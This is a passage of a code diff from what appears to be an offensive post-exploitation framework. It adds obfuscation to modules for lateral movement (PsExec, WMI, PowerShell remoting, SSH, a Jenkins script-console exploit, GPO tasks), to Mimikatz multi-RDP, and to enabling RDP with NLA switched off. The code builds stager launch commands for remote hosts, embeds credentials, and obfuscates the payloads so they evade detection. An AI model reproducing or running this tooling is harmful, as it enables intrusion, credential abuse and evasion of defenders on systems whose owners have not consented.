scriptEnd += " -UserName \"" + self.options['UserName']['Value'] + "\" -Password \"" + self.options['Password']['Value'] + "\""
if self.options['DriveLetter']['Value']:
script += " -DriveLetter \"" + self.options['DriveLetter']['Value'] + "\""
scriptEnd += " -DriveLetter \"" + self.options['DriveLetter']['Value'] + "\""
if self.options['FilePath']['Value']:
script += " -FilePath \"" + self.options['FilePath']['Value'] + "\""
scriptEnd += " -FilePath \"" + self.options['FilePath']['Value'] + "\""
script += " | Out-String"
scriptEnd += " | Out-String"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

16
lib/modules/powershell/lateral_movement/invoke_psexec.py
View File

@ -90,7 +90,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
computerName = self.options['ComputerName']['Value']
@ -103,7 +103,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/lateral_movement/Invoke-PsExec.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -115,7 +117,7 @@ class Module:
script = moduleCode
scriptEnd = ""
if command != "":
# executing a custom command on the remote machine
return ""
@ -139,9 +141,11 @@ class Module:
else:
stagerCmd = '%COMSPEC% /C start /b C:\\Windows\\System32\\WindowsPowershell\\v1.0\\' + launcher
script += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
scriptEnd += "Invoke-PsExec -ComputerName %s -ServiceName \"%s\" -Command \"%s\"" % (computerName, serviceName, stagerCmd)
script += "| Out-String | %{$_ + \"`n\"};"
scriptEnd += "| Out-String | %{$_ + \"`n\"};"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

5
lib/modules/powershell/lateral_movement/invoke_psremoting.py
View File

@ -88,7 +88,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
@ -135,5 +135,6 @@ class Module:
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-PSRemoting executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

17
lib/modules/powershell/lateral_movement/invoke_sshcommand.py
View File

@ -73,10 +73,12 @@ class Module:
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleSource = self.mainMenu.stagers.installPath + "/data/module_source/lateral_movement/Invoke-SSHCommand.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -88,7 +90,7 @@ class Module:
script = moduleCode
script += "\nInvoke-SSHCommand "
scriptEnd = "\nInvoke-SSHCommand "
# if a credential ID is specified, try to parse
credID = self.options["CredID"]['Value']
@ -117,9 +119,10 @@ class Module:
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

5
lib/modules/powershell/lateral_movement/invoke_wmi.py
View File

@ -88,7 +88,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
@ -144,5 +144,6 @@ class Module:
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames +"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

5
lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py
View File

@ -94,7 +94,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
script = """$null = Invoke-WmiMethod -Path Win32_process -Name create"""
@ -186,6 +186,7 @@ class Module:
script = "$PSPassword = \""+password+"\" | ConvertTo-SecureString -asPlainText -Force;$Credential = New-Object System.Management.Automation.PSCredential(\""+userName+"\",$PSPassword);" + script + " -Credential $Credential"
script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'"
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

18
lib/modules/powershell/lateral_movement/jenkins_script_console.py
View File

@ -82,7 +82,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# extract all of our options
listenerName = self.options['Listener']['Value']
userAgent = self.options['UserAgent']['Value']
@ -102,7 +102,9 @@ class Module:
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/exploitation/Exploit-Jenkins.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -114,9 +116,11 @@ class Module:
script = moduleCode
script += "\nExploit-Jenkins"
script += " -Rhost "+str(self.options['Rhost']['Value'])
script += " -Port "+str(self.options['Port']['Value'])
script += " -Cmd \"" + launcher + "\""
scriptEnd = "\nExploit-Jenkins"
scriptEnd += " -Rhost "+str(self.options['Rhost']['Value'])
scriptEnd += " -Port "+str(self.options['Port']['Value'])
scriptEnd += " -Cmd \"" + launcher + "\""
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

8
lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py
View File

@ -110,7 +110,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
listenerName = self.options['Listener']['Value']
@ -137,7 +137,6 @@ class Module:
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
@ -150,7 +149,7 @@ class Module:
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " -Command cmd -CommandArguments '"+command+"' -Force"
script = moduleName + " -Command cmd -CommandArguments '"+command+"' -Force"
for option,values in self.options.iteritems():
if option.lower() in ["taskname", "taskdescription", "taskauthor", "gponame", "gpodisplayname", "domain", "domaincontroller"]:
@ -162,5 +161,6 @@ class Module:
script += " -" + str(option) + " '" + str(values['Value']) + "'"
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

5
lib/modules/powershell/management/disable_rdp.py
View File

@ -48,11 +48,12 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# command to disable RDP
script = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 1 /f;"
# command to enable NLA only if the enable runs successfully
script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }"
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

8
lib/modules/powershell/management/downgrade_account.py
View File

@ -69,13 +69,12 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
@ -89,7 +88,7 @@ class Module:
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
@ -100,5 +99,6 @@ class Module:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

12
lib/modules/powershell/management/enable_multi_rdp.py
View File

@ -53,11 +53,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -69,6 +71,8 @@ class Module:
script = moduleCode
script += "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
scriptEnd = "Invoke-Mimikatz -Command '\"ts::multirdp\"';"
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

5
lib/modules/powershell/management/enable_rdp.py
View File

@ -48,7 +48,7 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# command to enable RDP
script = "reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections /t REG_DWORD /d 0 /f;"
@ -56,5 +56,6 @@ class Module:
script += " if($?) {$null = netsh firewall set service type = remotedesktop mod = enable;"
# command to disable NLA
script += "$null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 0 /f }"
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

14
lib/modules/powershell/management/get_domain_sid.py
View File

@ -53,13 +53,12 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
@ -73,16 +72,17 @@ class Module:
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
scriptEnd = ""
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
scriptEnd += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
scriptEnd += " -" + str(option) + " " + str(values['Value'])
scriptEnd += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(psScript=script, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
return script

14
lib/modules/powershell/management/honeyhash.py
View File

@ -65,11 +65,13 @@ class Module:
self.options[option]['Value'] = value
def generate(self):
def generate(self, obfuscate=False, obfuscationCommand=""):
# read in the common module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/management/New-HoneyHash.ps1"
if obfuscate:
helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
try:
f = open(moduleSource, 'r')
except:
@ -81,11 +83,13 @@ class Module:
script = moduleCode
script += "New-HoneyHash"
scriptEnd = "New-HoneyHash"
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
script += " -" + str(option) + " " + str(values['Value'])
scriptEnd += " -" + str(option) + " " + str(values['Value'])
if obfuscate:
scriptEnd = helpers.obfuscate(psScript=scriptEnd, installPath=self.mainMenu.installPath, obfuscationCommand=obfuscationCommand)
script += scriptEnd
return script

Some files were not shown because too many files have changed in this diff Show More